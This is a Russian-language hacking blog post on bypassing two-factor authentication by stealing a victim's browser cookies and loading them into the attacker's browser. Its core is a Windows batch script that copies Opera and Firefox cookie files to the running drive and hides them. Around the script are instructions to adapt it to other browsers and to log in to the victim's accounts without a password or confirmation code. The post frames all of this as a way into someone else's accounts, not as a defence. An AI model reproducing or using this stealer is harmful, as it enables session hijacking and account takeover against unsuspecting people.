Взлом и проверка на уязвимости

Обход двухфакторной аутентификации с помощью cookies

Обход двухфакторной аутентификации с помощью cookies

Двухфакторная аутентификация – это один из видом многофакторной аутентификации, известна ещё как “двухэтапная верификация” и представляет собой технологию, обеспечивающую идентификацию пользователей с помощью комбинации двух различных компонентов. Как самый понятный пример, можно взять аутентификацию в Google или Steam. Если вы заходите с нового компьютера, то вам помимо логина и пароля нужно ввести шестизначный код подтверждения. Как правило он приходит через SMS или голосовой вызов.
Плюсы двухфакторной аутентификации:

  • Защита одноразовым ключом с помощью подтверждения через смартфон;
  • Смартфон всегда под рукой, тем самым отсутствует необходимость в дополнительных токенах.

Минусы двухфакторной аутентификации через мобильное устройство:

  • Мобильный телефон должен ловить сеть, когда происходит аутентификация, иначе сообщение с паролем просто не дойдет;
  • Возможность перехвата сообщения с кодом подтверждения;
  • Сообщения приходят с задержкой, время уходит на проверку подлинности;
  • Вы делитесь номером, а значит есть возможность, что будет приходить спам.
Обход двухфакторной аутентификации крайне сложный процесс, если работать методом перехвата текстового сообщения может уйти много времени. По этому я расскажу про метод с помощью перехвата, стиллера cookies.
На сайте уже есть статья о стиллере паролей – читать, а также с приложениями для Android, для перехвата трафика, в том числе и cookies – click.

Обход двухфакторной аутентификации с помощью подмены cookies

Cookies
Существует множество плагинов, позволяющих загрузить свои cookies, скачайте и установите один из них.
Для начала требуется перехватить или украсть cookies у человека, к которому вы хотите зайти не зная логина и пароля. Для этого вы можете воспользоваться одним из приложений или переделать наш портативный стиллер, чтобы он работал с Куки.
Код для кражи cookies с браузеров Opera & Mozilla:
@echo off
md %~d0Mozilla
md %~d0Opera
CD/D %APPDATA%OperaOpera
copy /y cookies.dat %~d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y cookies.sqlite %~d0Mozilla
ATTRIB -R -A -S -H
attrib +h %~d0Opera
attrib +h %~d0Mozilla

Модифицировать данный код под любой браузер не составит труда, главное найти нужные директории.
После того, как у вас появились нужные cookies, требуется очистить браузер от всех Куки, которые там есть и добавить те, которые вы перехватилиукрали.
Всё, можете проверять сервисы. Если человек был на сайте с двухэтапной аутентификацией, то вам не потребуется ни логина-пароля, ни  кода подтверждения, так как вы сразу попадете на авторизованную страницу.
Данный обход двухэтапной аутентификации имеет ряд минусов:

  • Не знаете ни логина, ни пароля;
  • Нет возможности изменить пароль или получить резервные коды;
  • Не работает с сервисами, требующими подтверждения каждый раз, вне зависимости от того, был ранее совершен вход с устройства или нет.

Обход двухфакторной аутентификации с помощью подмены cookies – это довольно простой и эффективный способ, которым может воспользоваться абсолютно каждый без особых усилий.
Если вам понравилась статья, подписывайтесь на обновление сайта, а также наш Telegram.

Telegram

Подписывайтесь на официальный Telegram канал сайта Make Info.

Related Articles

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Back to top button
Adblock
detector
. 102 запросов. 0,276 секунд.